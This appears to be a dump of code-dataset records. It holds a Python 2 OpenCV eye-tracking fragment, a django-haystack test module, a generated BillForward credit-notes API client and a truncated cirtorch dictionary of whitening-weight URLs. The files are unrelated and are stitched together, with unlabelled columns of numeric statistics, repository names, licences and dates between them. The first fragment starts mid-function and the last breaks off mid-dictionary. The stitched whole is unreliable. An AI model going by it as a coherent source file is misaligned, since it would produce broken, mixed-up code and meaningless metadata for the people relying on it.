frame = cv2.cvtColor(frame,cv2.COLOR_RGB2GRAY)
frame = frame[0:700, 200:1000]
faces = cv2.CascadeClassifier('haarcascade_eye.xml')
detected = faces.detectMultiScale(frame, 1.3, 5)
#faces = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
# detected2 = faces.detectMultiScale(frameDBW, 1.3, 5)
pupilFrame = frame
pupilO = frame
#
windowClose = np.ones((5,5),np.uint8)
windowOpen = np.ones((2,2),np.uint8)
windowErode = np.ones((2,2),np.uint8)
# draw square
for (x,y,w,h) in detected:
cv2.rectangle(frame, (x,y), ((x+w),(y+h)), (0,0,255),1)
cv2.line(frame, (x,y), ((x+w,y+h)), (0,0,255),1)
cv2.line(frame, (x+w,y), ((x,y+h)), (0,0,255),1)
cv2.rectangle(frame, (x+(w/5), y+(h)), (x+(w*4/5), y+(h*3/4)), (0,0,255), 1)
cv2.imshow('frame2',frame)
pupilFrame = cv2.equalizeHist(frame[int(y+(h*.25)):(y+h), x:(x+w)])
cv2.line(frame, (x+(w/2),0), (x+(w/2),y+h), (0,0,255),1)
cv2.line(frame, (0,y+(h/2)), (x+w,y+(h/2)), (0,0,255),1)
eye = frame[(y+(h/3)):(y+(h*2/3)), (x+(w/4)):(x+(w*3/4))]
eye = cv2.equalizeHist(eye)
h, w = eye.shape
eye = cv2.flip(eye, 1)
#cv2.imshow("framss", eye)
topleft = eye[0:h/2, 0:w/2]
topright = eye[0:h/2, w/2:w]
bottomleft = eye[h/2:h, 0:w/2]
bottomright = eye[h/2:h, w/2:w]
#cv2.imshow("eye", eye)
#cv2.moveWindow("framss", 600, 600)
# print eye[0, 0]
# print eye[h-1,w-1]
# print eye[0,w-1]
# print eye[h-1,0]
# print "------------"
startx = 0
starty = 0
# cv2.imshow("top left", topleft)
# cv2.moveWindow("top left", startx, starty)
# cv2.imshow("top right", topright)
# cv2.moveWindow("top right", w/2, starty)
# cv2.imshow("bottom left", bottomleft)
# cv2.moveWindow("bottom left", startx, h*2)
# cv2.imshow("bottom right", bottomright)
# cv2.moveWindow("bottom right", w/2, h*2)
quadrants = [[topleft, topright],
[bottomleft, bottomright]]
if(count<testSize):
baseline += np.array(process(quadrants))
elif(count == testSize):
baseline/=testSize
print "Done with Baseline"
else:
difference = np.array(process(quadrants))-np.array(baseline)
#difference = np.absolute(difference)
max = np.amax(difference)
index = np.where(difference==max)
difference = list(difference)
index = list(index)
max = difference[index[0][0]][index[1][0]]
#print max
if(max<75):
#print "Straight Ahead"
eyeMovement.append(0)
continue
for j in range(0, len(quadrants)):
for k in range(0, len(quadrants[0])):
quadrants[j][k] = replace(quadrants[j][k], difference[j][k], max)
if(index[0].any() == 0):
if(index[1].any() == 1):
eyeMovement.append(2)
#print "Top Right"
k = 1
else:
k = 1
eyeMovement.append(1)
#print "Top Left"
else:
if(index[1].any() == 1):
k = 1
eyeMovement.append(3)
#print "Bottom Right"
else:
k = 1
eyeMovement.append(4)
#print "Bottom Left"
count+=1
h*=2
starty+=h
starty+=(h/2)
# cv2.imshow("top left1", quadrants[0][0])
# cv2.moveWindow("top left1", startx, starty)
# cv2.imshow("top right1", quadrants[0][1])
# cv2.moveWindow("top right1", w/2, starty)
# cv2.imshow("bottom left1", quadrants[1][0])
# cv2.moveWindow("bottom left1", startx, h*2)
# cv2.imshow("bottom right1", quadrants[1][1])
# cv2.moveWindow("bottom right1", w/2, h*2)
curr_time = time.time() - start_time
if cv2.waitKey(1) & 0xFF == ord('q'):
break
return eyeMovement
| 29.788644
| 93
| 0.590914
| 1,432
| 9,443
| 3.877095
| 0.118017
| 0.009726
| 0.012608
| 0.012968
| 0.852305
| 0.852305
| 0.852305
| 0.84402
| 0.84402
| 0.84402
| 0
| 0.067476
| 0.215292
| 9,443
| 317
| 94
| 29.788644
| 0.681781
| 0.271736
| 0
| 0.790476
| 0
| 0
| 0.015899
| 0
| 0
| 0
| 0.001178
| 0
| 0
| 0
| null | null | 0
| 0.02381
| null | null | 0.014286
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ae5c8692645d9d7e82fc99c5e0dff8d348fb6ca
| 152
|
py
|
Python
|
tests/simple_tests/tests/__init__.py
|
pbs/django-haystack
|
433e154f76a450ffc095792c6f2e051ef508fc2d
|
[
"BSD-3-Clause"
] | 2
|
2015-01-10T09:14:47.000Z
|
2018-11-19T13:45:55.000Z
|
tests/simple_tests/tests/__init__.py
|
ericholscher/django-haystack
|
1fde37afa4921c2121a95a4902f2012bbf837bf1
|
[
"BSD-3-Clause"
] | 1
|
2017-06-13T02:08:54.000Z
|
2017-06-13T02:22:15.000Z
|
tests/simple_tests/tests/__init__.py
|
ericholscher/django-haystack
|
1fde37afa4921c2121a95a4902f2012bbf837bf1
|
[
"BSD-3-Clause"
] | 2
|
2015-08-11T17:00:42.000Z
|
2021-01-04T08:39:33.000Z
|
import warnings
warnings.simplefilter('ignore', Warning)
from simple_tests.tests.simple_query import *
from simple_tests.tests.simple_backend import *
| 25.333333
| 47
| 0.835526
| 20
| 152
| 6.15
| 0.5
| 0.162602
| 0.243902
| 0.325203
| 0.422764
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085526
| 152
| 5
| 48
| 30.4
| 0.884892
| 0
| 0
| 0
| 0
| 0
| 0.039474
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c15aeb36ea9bbf28261e15d3f2aebfa198fb233a
| 33,584
|
py
|
Python
|
billforward/apis/creditnotes_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 2
|
2016-11-23T17:32:37.000Z
|
2022-02-24T05:13:20.000Z
|
billforward/apis/creditnotes_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | null | null | null |
billforward/apis/creditnotes_api.py
|
billforward/bf-python
|
d2b812329ca3ed1fd94364d7f46f69ad74665596
|
[
"Apache-2.0"
] | 1
|
2016-12-30T20:02:48.000Z
|
2016-12-30T20:02:48.000Z
|
# coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class CreditnotesApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_credit_note(self, credit_note, **kwargs):
"""
Create a credit note.
{\"nickname\":\"Create a new credit note\",\"request\":\"createCreditNoteRequest.html\",\"response\":\"createCreditNoteResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_credit_note(credit_note, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param CreditNote credit_note: The credit note object to be created. (required)
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_credit_note_with_http_info(credit_note, **kwargs)
else:
(data) = self.create_credit_note_with_http_info(credit_note, **kwargs)
return data
def create_credit_note_with_http_info(self, credit_note, **kwargs):
"""
Create a credit note.
{\"nickname\":\"Create a new credit note\",\"request\":\"createCreditNoteRequest.html\",\"response\":\"createCreditNoteResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_credit_note_with_http_info(credit_note, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param CreditNote credit_note: The credit note object to be created. (required)
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['credit_note']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_credit_note" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'credit_note' is set
if ('credit_note' not in params) or (params['credit_note'] is None):
raise ValueError("Missing the required parameter `credit_note` when calling `create_credit_note`")
resource_path = '/credit-notes'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'credit_note' in params:
body_params = params['credit_note']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreditNotePagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_credit_note_by_id(self, credit_note_id, **kwargs):
"""
Returns a single credit-note, specified by the ID parameter.
{\"nickname\":\"Retrieve an existing credit note\",\"response\":\"getCreditNoteByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_by_id(credit_note_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str credit_note_id: ID of the credit-note. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_credit_note_by_id_with_http_info(credit_note_id, **kwargs)
else:
(data) = self.get_credit_note_by_id_with_http_info(credit_note_id, **kwargs)
return data
def get_credit_note_by_id_with_http_info(self, credit_note_id, **kwargs):
"""
Returns a single credit-note, specified by the ID parameter.
{\"nickname\":\"Retrieve an existing credit note\",\"response\":\"getCreditNoteByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_by_id_with_http_info(credit_note_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str credit_note_id: ID of the credit-note. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['credit_note_id', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_credit_note_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'credit_note_id' is set
if ('credit_note_id' not in params) or (params['credit_note_id'] is None):
raise ValueError("Missing the required parameter `credit_note_id` when calling `get_credit_note_by_id`")
resource_path = '/credit-notes/{credit-note-ID}'.replace('{format}', 'json')
path_params = {}
if 'credit_note_id' in params:
path_params['credit-note-ID'] = params['credit_note_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreditNotePagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_credit_note_for_account(self, account_id, **kwargs):
"""
Returns credit notes for an account.
{\"nickname\":\"Retrieve by account\",\"response\":\"getCreditNotesByAccount.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_for_account(account_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str account_id: ID of the account. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first payment to return.
:param int records: The maximum number of payments to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_credit_note_for_account_with_http_info(account_id, **kwargs)
else:
(data) = self.get_credit_note_for_account_with_http_info(account_id, **kwargs)
return data
def get_credit_note_for_account_with_http_info(self, account_id, **kwargs):
"""
Returns credit notes for an account.
{\"nickname\":\"Retrieve by account\",\"response\":\"getCreditNotesByAccount.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_for_account_with_http_info(account_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str account_id: ID of the account. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first payment to return.
:param int records: The maximum number of payments to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'organizations', 'offset', 'records', 'order_by', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_credit_note_for_account" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params) or (params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `get_credit_note_for_account`")
resource_path = '/credit-notes/account/{account-ID}'.replace('{format}', 'json')
path_params = {}
if 'account_id' in params:
path_params['account-ID'] = params['account_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreditNotePagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_credit_note_for_invoice(self, invoice_id, **kwargs):
"""
Returns credit notes for an invoice.
{\"nickname\":\"Retrieve by invoice\",\"response\":\"getCreditNotesByInvoice.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_for_invoice(invoice_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str invoice_id: ID of the Invoice. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first payment to return.
:param int records: The maximum number of payments to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_credit_note_for_invoice_with_http_info(invoice_id, **kwargs)
else:
(data) = self.get_credit_note_for_invoice_with_http_info(invoice_id, **kwargs)
return data
def get_credit_note_for_invoice_with_http_info(self, invoice_id, **kwargs):
"""
Returns credit notes for an invoice.
{\"nickname\":\"Retrieve by invoice\",\"response\":\"getCreditNotesByInvoice.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_for_invoice_with_http_info(invoice_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str invoice_id: ID of the Invoice. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first payment to return.
:param int records: The maximum number of payments to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['invoice_id', 'organizations', 'offset', 'records', 'order_by', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_credit_note_for_invoice" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'invoice_id' is set
if ('invoice_id' not in params) or (params['invoice_id'] is None):
raise ValueError("Missing the required parameter `invoice_id` when calling `get_credit_note_for_invoice`")
resource_path = '/credit-notes/invoice/{invoice-ID}'.replace('{format}', 'json')
path_params = {}
if 'invoice_id' in params:
path_params['invoice-ID'] = params['invoice_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreditNotePagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_credit_note_for_subscription(self, subscription_id, **kwargs):
"""
Returns credit notes for an subscription.
{\"nickname\":\"Retrieve by subscription\",\"response\":\"getCreditNotesSubscription.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_for_subscription(subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str subscription_id: ID of the subscription. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first payment to return.
:param int records: The maximum number of payments to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_credit_note_for_subscription_with_http_info(subscription_id, **kwargs)
else:
(data) = self.get_credit_note_for_subscription_with_http_info(subscription_id, **kwargs)
return data
def get_credit_note_for_subscription_with_http_info(self, subscription_id, **kwargs):
"""
Returns credit notes for an subscription.
{\"nickname\":\"Retrieve by subscription\",\"response\":\"getCreditNotesSubscription.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_credit_note_for_subscription_with_http_info(subscription_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str subscription_id: ID of the subscription. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first payment to return.
:param int records: The maximum number of payments to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['subscription_id', 'organizations', 'offset', 'records', 'order_by', 'order']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_credit_note_for_subscription" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'subscription_id' is set
if ('subscription_id' not in params) or (params['subscription_id'] is None):
raise ValueError("Missing the required parameter `subscription_id` when calling `get_credit_note_for_subscription`")
resource_path = '/credit-notes/subscription/{subscription-ID}'.replace('{format}', 'json')
path_params = {}
if 'subscription_id' in params:
path_params['subscription-ID'] = params['subscription_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreditNotePagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def retire_credit_note(self, credit_note_id, organizations, **kwargs):
"""
Removes any remaining value from credit note
{\"nickname\":\"Removes remaining value from credit note\",\"response\":\"deleteCreditNote.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.retire_credit_note(credit_note_id, organizations, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str credit_note_id: ID of the credit-note. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls. (required)
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.retire_credit_note_with_http_info(credit_note_id, organizations, **kwargs)
else:
(data) = self.retire_credit_note_with_http_info(credit_note_id, organizations, **kwargs)
return data
def retire_credit_note_with_http_info(self, credit_note_id, organizations, **kwargs):
"""
Removes any remaining value from credit note
{\"nickname\":\"Removes remaining value from credit note\",\"response\":\"deleteCreditNote.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.retire_credit_note_with_http_info(credit_note_id, organizations, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str credit_note_id: ID of the credit-note. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls. (required)
:return: CreditNotePagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['credit_note_id', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method retire_credit_note" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'credit_note_id' is set
if ('credit_note_id' not in params) or (params['credit_note_id'] is None):
raise ValueError("Missing the required parameter `credit_note_id` when calling `retire_credit_note`")
# verify the required parameter 'organizations' is set
if ('organizations' not in params) or (params['organizations'] is None):
raise ValueError("Missing the required parameter `organizations` when calling `retire_credit_note`")
resource_path = '/credit-notes/{credit-note-ID}'.replace('{format}', 'json')
path_params = {}
if 'credit_note_id' in params:
path_params['credit-note-ID'] = params['credit_note_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreditNotePagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 44.958501
| 143
| 0.597546
| 3,642
| 33,584
| 5.301208
| 0.066172
| 0.060082
| 0.021132
| 0.022375
| 0.924432
| 0.907236
| 0.897809
| 0.883048
| 0.87186
| 0.858342
| 0
| 0.000436
| 0.317413
| 33,584
| 746
| 144
| 45.018767
| 0.841782
| 0.389501
| 0
| 0.760116
| 1
| 0
| 0.18801
| 0.05044
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037572
| false
| 0
| 0.020231
| 0
| 0.112717
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c16b3b33b726c1d2492967a80b684f111484ebf8
| 4,881
|
py
|
Python
|
cirtorch/modules/utils.py
|
Tarekbouamer/Image-Retrieval-for-Image-Based-Localization
|
fcad9af4f558bebb3cbec1d08e49603a452f439d
|
[
"BSD-3-Clause"
] | 3
|
2021-01-15T13:58:22.000Z
|
2021-01-22T00:03:34.000Z
|
cirtorch/modules/utils.py
|
Tarekbouamer/Image-Retrieval-for-Image-Based-Localization
|
fcad9af4f558bebb3cbec1d08e49603a452f439d
|
[
"BSD-3-Clause"
] | null | null | null |
cirtorch/modules/utils.py
|
Tarekbouamer/Image-Retrieval-for-Image-Based-Localization
|
fcad9af4f558bebb3cbec1d08e49603a452f439d
|
[
"BSD-3-Clause"
] | null | null | null |
# for some models, we have imported features (convolutions) from caffe
# because the image retrieval performance is higher for them
# pre-computed localFeatures pca whitening that can be applied before the pooling layer
L_WHITENING = {
'resnet101' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-lwhiten-9f830ef.pth', # no pre l2 norm
# 'resnet101' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-lwhiten-da5c935.pth', # with pre l2 norm
}
# possible globalFeatures pooling layers, each on of these can be made regional
# pre-computed regional whitening, for most commonly used architectures and pooling methods
R_WHITENING = {
'alexnet-gem-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-alexnet-gem-r-rwhiten-c8cf7e2.pth',
'vgg16-gem-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-vgg16-gem-r-rwhiten-19b204e.pth',
'resnet101-mac-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-mac-r-rwhiten-7f1ed8c.pth',
'resnet101-gem-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-resnet101-gem-r-rwhiten-adace84.pth',
}
# pre-computed final (globalFeatures) whitening, for most commonly used architectures and pooling methods
WHITENING = {
'alexnet-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-alexnet-gem-whiten-454ad53.pth',
'alexnet-gem-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-alexnet-gem-r-whiten-4c9126b.pth',
'vgg16-gem' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-vgg16-gem-whiten-eaa6695.pth',
'vgg16-gem-r' : 'http://cmp.felk.cvut.cz/cnnimageretrieval/data/whiten/retrieval-SfM-120k/retrieval-SfM-120k-vgg16-gem-r-whiten-83582df.pth',
